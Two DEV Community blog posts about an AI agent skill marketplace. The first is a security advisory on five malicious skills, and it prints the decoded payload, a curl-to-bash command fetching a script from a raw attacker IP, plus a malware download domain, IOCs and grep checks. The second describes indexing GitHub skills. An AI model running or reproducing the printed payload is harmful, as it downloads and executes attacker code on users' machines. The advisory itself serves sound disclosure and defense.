DEV Community: airano

🚨 Malware Found in AI Agent Skills: A Security Advisory

airano — Fri, 20 Mar 2026 02:16:27 +0000

We recently discovered malware hiding in plain sight within AI agent skill files on GitHub. This post details the attack, how we caught it, and what to do if you're affected.

What Happened

During routine AI-powered security reviews on SkillHub — an open-source marketplace for AI agent skills — our automated review pipeline flagged 5 skills from the openclaw/skills GitHub repository as malicious.

These skills disguise themselves as useful tools:

Skill	Claimed Purpose	Downloads
auto-updater	Auto-update installed skills	443
gog	Google Workspace CLI	176
excel	Excel file handling	149
nano-pdf	PDF editing	133
youtube-watcher	YouTube transcripts	115

Total affected downloads: ~1,016

The Attack

All five skills follow the same pattern:

Present as a legitimate, useful tool
Require installing "OpenClawProvider" as a dependency
The installation instructions contain a base64-encoded command

On macOS, the encoded payload decodes to:

/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"

This silently downloads and executes an arbitrary script from a raw IP address — a textbook malware delivery technique.

On Windows, users are directed to a password-protected archive (password: openclaw) from install.app-distribution.net.

Why This Matters

AI agent skills are a new attack surface. Skills are designed to be loaded by AI agents that often have system-level access — file system, shell execution, network. A malicious skill doesn't just compromise data; it can weaponize the AI agent itself.

This is a supply-chain attack targeting developers and AI users. The openclaw/skills repository has 90K+ commits and thousands of legitimate skills, providing cover for the malicious ones.

How We Caught It

SkillHub uses a multi-phase AI review pipeline:

Phase A: Quick content filter scans for suspicious patterns (base64 blobs, encoded URLs, eval/exec patterns)
Phase B: Deep file analysis examines the full skill contents and identifies obfuscated execution chains

The AI reviewer identified the base64→curl→bash pattern and automatically flagged the skills as malicious.

What We Did

All five skills were immediately:

Flagged as malicious (warning page, not 404)
File downloads blocked (HTTP 403)
CLI installation blocked
Removed from all browse/search listings

Are You Affected?

If you've installed any skills from openclaw/skills, check for:

Search for the malicious pattern

grep -r "OpenClawProvider" ~/.claude/ ~/.codex/ .cursor/ 2>/dev/null
grep -r "91.92.242.30" ~/.claude/ ~/.codex/ .cursor/ 2>/dev/null

If found: Delete the skill files, check your shell history and crontabs, rotate any credentials that were accessible, and run a malware scan.

IOCs

IP: 91.92.242.30 (Omegatech LTD, Seychelles)
Domain: install.app-distribution.net
Pattern: "OpenClawProvider" in setup instructions

Full Advisory

Read the complete advisory with detailed remediation steps: blog.palebluedot.live/malware-openclaw-skills-security-advisory

Investigation is ongoing. If you find suspicious skills, report them on SkillHub's support page.

SkillHub is an open-source marketplace for AI agent skills with automated security review.

How I Indexed 172,000+ AI Agent Skills Using Multi-Strategy Discovery

airano — Tue, 03 Feb 2026 00:11:09 +0000

GitHub's search API has a hard limit: 1,000 results per query.

We have 172,000+ skills indexed.

Here's how we built a discovery system that found them all—without breaking any rules.

The Problem: Skills Are Everywhere

AI agents like Claude Code, OpenAI Codex, and GitHub Copilot use SKILL.md files to learn new capabilities. These skills teach agents how to handle PDFs, write Excel formulas, follow brand guidelines, and much more.

The problem? These skills are scattered across thousands of GitHub repositories:

Some live in ~/.claude/skills/
Others in .github/skills/
Many in random skills/ folders
And countless more in personal dotfiles repos

Finding the right skill is like searching for a needle in a haystack of haystacks.

I tried GitHub's search: filename:SKILL.md. It returned results, but never more than 1,000. The GitHub API documentation confirms this limit—and there's no way around it with a single query.

So I built something different.

Our Approach: Multi-Strategy Discovery

Instead of fighting the 1,000-result limit, we work with it by running multiple specialized searches. Each strategy targets a different slice of the skill ecosystem.

Strategy 1: Path-Based Search

Skills follow predictable directory patterns. We search each path separately:

filename:SKILL.md path:skills
filename:SKILL.md path:.claude
filename:SKILL.md path:.github
filename:SKILL.md path:.codex

Each query can return up to 1,000 results. Four queries = up to 4,000 potential discoveries.

Strategy 2: File Size Segmentation

GitHub lets you filter by file size. We segment our searches:

filename:SKILL.md size:<1000      # Small skills
filename:SKILL.md size:1000..5000 # Medium skills
filename:SKILL.md size:>5000      # Large skills

Same file, different queries, different result sets.

Strategy 3: Topic-Based Discovery

Many skill repositories use GitHub topics. We search for repos tagged with:

claude-skills
agent-skills
ai-skills
mcp-skills
llm-skills

Then deep-scan each repository for SKILL.md files.

Strategy 4: Awesome List Crawling

The community maintains curated lists of skills:

awesome-claude-skills
awesome-agent-skills
awesome-copilot

We parse these lists and index every linked repository.

Strategy 5: Fork Network Traversal

When we find a popular skills repository, we also check its forks. Forks often contain additional or modified skills that never made it back to the original repo.

The Stack

Here's what powers the discovery and search:

Component	Technology	Purpose
Web App	Next.js 15	Marketplace UI
Database	PostgreSQL	Skill metadata, ratings
Search	Meilisearch	Full-text search with typo tolerance
Queue	Redis + BullMQ	Background crawl jobs
CLI	Node.js	Install skills from terminal

The indexer runs on a schedule:

Daily: Incremental crawl (new/updated skills)
Weekly: Full discovery (all strategies)
On-demand: Process user-submitted repositories

All queries use authenticated GitHub API requests with proper rate limit handling. We rotate between multiple tokens to stay well within limits.

Results

After running our multi-strategy discovery:

Metric	Count
Skills Indexed	172,000+
Contributors	4,000+
Categories	30
Platforms	Claude, Codex, Copilot

The search is fast. Type "pdf" and get relevant results in milliseconds, ranked by GitHub stars, download count, and security status.

Every skill is scanned for:

Dangerous shell commands
Prompt injection patterns
Data exfiltration attempts

Skills that pass get a green checkmark. Those with issues get flagged.

Try It Now

Install the CLI:

npm install -g skillhub

Search for skills:

skillhub search pdf

Install a skill:

skillhub install anthropics/skills/pdf

Or browse all 172,000+ skills on the web:

skills.palebluedot.live

What's Next

We're working on:

Native Claude Code integration via MCP protocol
Skill verification with author confirmation
Usage analytics so you know which skills actually work

The entire project is open source under MIT license.

Your Turn

What skills would you like to see indexed? Any repositories we should add?

Drop a comment below—I read every one.

Built with Next.js, PostgreSQL, Meilisearch, and way too much coffee.